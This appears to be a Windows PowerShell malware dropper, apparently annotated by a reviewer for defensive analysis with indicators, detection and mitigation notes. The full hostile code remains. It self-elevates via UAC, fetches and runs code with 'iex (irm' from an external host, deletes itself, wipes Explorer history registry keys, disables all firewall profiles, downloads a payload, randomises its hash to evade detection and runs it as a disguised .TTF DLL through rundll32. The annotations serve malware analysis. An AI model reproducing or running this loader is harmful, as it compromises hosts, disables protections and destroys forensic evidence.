<#
  Reviewer annotation (defensive analysis). This is a PowerShell dropper/loader, not a shell script,
  and it is shown collapsed onto two physical lines: each "#" line comment from the original file now
  swallows the statements that follow it, and the second line begins mid-statement, so the text as
  shown does not parse. The code is left byte-for-byte as found; only comments are added/translated.

  Behaviour visible in the script, in order:
    1. Self-elevates through UAC (Start-Process -Verb RunAs) with -NoProfile -ExecutionPolicy Bypass,
       either re-running itself from disk (-File "$PSCommandPath") or, when there is no script path,
       re-fetching itself in memory with "iex (irm https://ktfkxw.gxyibai.cn)"; it then spawns a second
       powershell that deletes the on-disk script one second later (self-deletion).
    2. Stops a service named MessageTransfer (its role is not evident from this file).
    3. Deletes Explorer usage-history keys (RunMRU, RecentDocs, FeatureUsage, TypedPaths, ComDlg32)
       under HKCU — anti-forensics, destroying user-activity artefacts.
    4. Disables the Windows firewall on the Public, Private and Domain profiles.
    5. Kills rundll32.exe in a burst of 11 Stop-Process calls.
    6. Downloads a base64 blob from http://ktfkxw.gxyibai.cn/KTXP.txt (Invoke-RestMethod, curl.exe
       fallback), decodes it, overwrites 16796 bytes at a fixed 34-byte marker with System.Random
       output so the dropped file's hash differs on every run, and writes it to
       %TEMP%\DL_<yyyyMMddHHmmss><random>\<random>1.TTF.
    7. Executes that file as a DLL via rundll32.exe "<path>",XPA and exits.

  Indicators present on this page: the two URLs above, the service name MessageTransfer, the export
  name XPA, the %TEMP%\DL_* directory and *1.TTF file naming, and the 34-byte marker starting
  0xD7 0x97 0x10 0x00. Detection: PowerShell script-block logging (event 4104) for "iex (irm",
  "-ExecutionPolicy Bypass" combined with "-Verb RunAs"; process creation of rundll32.exe whose
  argument is a %TEMP% path ending in .TTF; Set-NetFirewallProfile ... -Enabled False; deletion of
  the Explorer MRU keys listed above. Mitigation: application control (AppLocker/WDAC) for DLLs
  loaded from %TEMP%, tamper protection on firewall settings, Constrained Language Mode, and
  alerting on the registry and firewall changes above.
#>
# Check for administrator privileges; otherwise relaunch the script as administrator <# Stage 1: elevation. Not Administrator -> relaunch via Start-Process -Verb RunAs (UAC prompt). Branch "1": no $PSCommandPath (running in memory), so it re-fetches itself with iex (irm https://ktfkxw.gxyibai.cn). Branch "2": re-runs the file with -File, then a second powershell removes the script file after 1 s (self-deletion). The "1"/"2" Write-Host lines are branch markers. #> if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Host "Requires administrator privileges, restarting script..." -ForegroundColor Yellow if (-not $PSCommandPath) { Write-Host "1" -ForegroundColor Yellow Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"iex (irm https://ktfkxw.gxyibai.cn)`"" -Verb RunAs } else { Write-Host "2" -ForegroundColor Yellow Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow } Start-Sleep -Seconds 2 exit } # Stop a specific service <# Stage 2: stops MessageTransfer silently; the "UAC" message printed afterwards is an unrelated progress label (the elevation check is already finished). #> Stop-Service -Name MessageTransfer -ErrorAction SilentlyContinue Start-Sleep -Seconds 2 Write-Host "UAC" -ForegroundColor Green # Clean specific registry keys <# Stage 3: anti-forensics. Every child of HKCU\...\Explorer whose name is in $targetKeys is removed recursively: RunMRU (Run dialog history), RecentDocs, FeatureUsage, TypedPaths (address-bar history), ComDlg32 (open/save dialog MRUs). Errors are suppressed. #> $basePath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" $targetKeys = @("RunMRU", "RecentDocs","FeatureUsage","TypedPaths","ComDlg32") Get-ChildItem -Path $basePath | ForEach-Object { if ($targetKeys -contains $_.PSChildName) { $targetPath = Join-Path -Path $basePath -ChildPath $_.PSChildName Remove-Item -Path $targetPath -Recurse -Force -ErrorAction SilentlyContinue } } # Set execution policy <# Process-scope Bypass; redundant with the -ExecutionPolicy Bypass already passed on the elevated relaunch. The "cl:" error label is the author's own terse prefix. #> try { Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force } catch { Write-Host "cl: $($_.Exception.Message)" -ForegroundColor Red } # Turn off the firewall <# Stage 4: disables all three firewall profiles (requires the elevation from stage 1). A profile change like this is recorded by the firewall's own operational log and should be alerted on. #> try { Set-NetFirewallProfile -Profile Public,Private,Domain -Enabled False } catch { Write-Host "fhq nook: $($_.Exception.Message)" -ForegroundColor Red } # Forcibly kill the rundll32 process multiple times <# Stage 5: 11 back-to-back Stop-Process calls with no delay — presumably to end any earlier rundll32-hosted copy before the new one is launched at the end (inferred, not stated by the code). #> for ($i = 1; $i -le 11; $i++) { Stop-Process -Name rundll32 -Force -ErrorAction SilentlyContinue } # Download link <# Stage 6: hard-coded payload URL. Because $downloadLink is a non-empty literal, the "-not $downloadLink" guard can never be true; its self-delete-and-exit branch is dead code. #> $downloadLink = "http://ktfkxw.gxyibai.cn/KTXP.txt" if (-not $downloadLink) { Write-Host "No download link found." 
-ForegroundColor Red Start-Sleep -Seconds 2 $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow exit } # Generate a temporary save path <# Drop location: %TEMP%\DL_<yyyyMMddHHmmss><random>\<random>1.TTF. The .TTF (font) extension is a disguise — the file is handed to rundll32.exe as a DLL in stage 7. #> $randomDir = Join-Path $env:TEMP ("DL_" + (Get-Date -Format "yyyyMMddHHmmss") + (Get-Random)) $outFile = Join-Path $randomDir ((Get-Random).ToString() + "1.TTF") New-Item -Path $randomDir -ItemType Directory -Force | Out-Null # Download Base64 content; fall back to curl.exe on failure <# Invoke-RestMethod first, then "curl.exe -s" (the throw message below is the original Chinese literal, "curl.exe download failed or content empty", and is left as is). NOTE(review): curl output is an array of lines, so FromBase64String on a multi-line blob may fail — unverified. Any failure path self-deletes the script and exits. #> try { $base64EncodedContent = Invoke-RestMethod -Uri $downloadLink -ErrorAction Stop } catch { try { $base64EncodedContent = & curl.exe -s $downloadLink if (-not $base64EncodedContent) { throw "curl.exe 下载失败或内容为空" } } catch { Start-Sleep -Seconds 2 $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow exit } } <# Hash-evasion patch: linear scan for the 34-byte marker; on a hit, 16796 bytes from that offset are overwritten with System.Random output, so each dropped file has a unique hash. $binaryData and $binaryContent reference the same byte[] (arrays are reference types), so [Array]::Copy mutates both and the later reassignment is a no-op. There is no check that $pos + 16796 stays within the array, so a truncated blob would throw here. The Write-Output literal means "matching byte sequence not found". #> $binaryContent = [Convert]::FromBase64String($base64EncodedContent) $binaryData=$binaryContent $pattern = [byte[]](0xD7, 0x97, 0x10, 0x00, 0xD7, 0x97, 0x10, 0x00, 0xD6, 0x97, 0x0F, 0x0A, 0xD9, 0x97, 0x11, 0x2D, 0xDB, 0x97, 0x12, 0x74, 0xDB, 0x96, 0x11, 0xA8, 0xDB, 0x96, 0x11, 0xD9, 0xDB, 0x96, 0x12, 0xFF, 0xDB, 0x96) $replace_length = 16796 $pos = -1 for ($i = 0; $i -le $binaryData.Length - $pattern.Length; $i++) { $match = $true for ($j = 0; $j -lt $pattern.Length; $j++) { if ($binaryData[$i + $j] -ne $pattern[$j]) { $match = $false break } } if ($match) { $pos = $i break } } if ($pos -ge 0) { $randomBytes = New-Object byte[] $replace_length (New-Object Random).NextBytes($randomBytes) [Array]::Copy($randomBytes, 0, $binaryData, $pos, $replace_length) $binaryContent=$binaryData } else { Write-Output "未找到匹配字节序列" } [System.IO.File]::WriteAllBytes($outFile, $binaryContent) # Run the downloaded file <# Stage 7: rundll32.exe "<outFile>",XPA loads the .TTF as a DLL and calls its XPA export, then the script exits. Detection hook: rundll32.exe with a %TEMP% argument ending in .TTF. #> Start-Process -FilePath "rundll32.exe" -ArgumentList "`"$outFile`",XPA" exit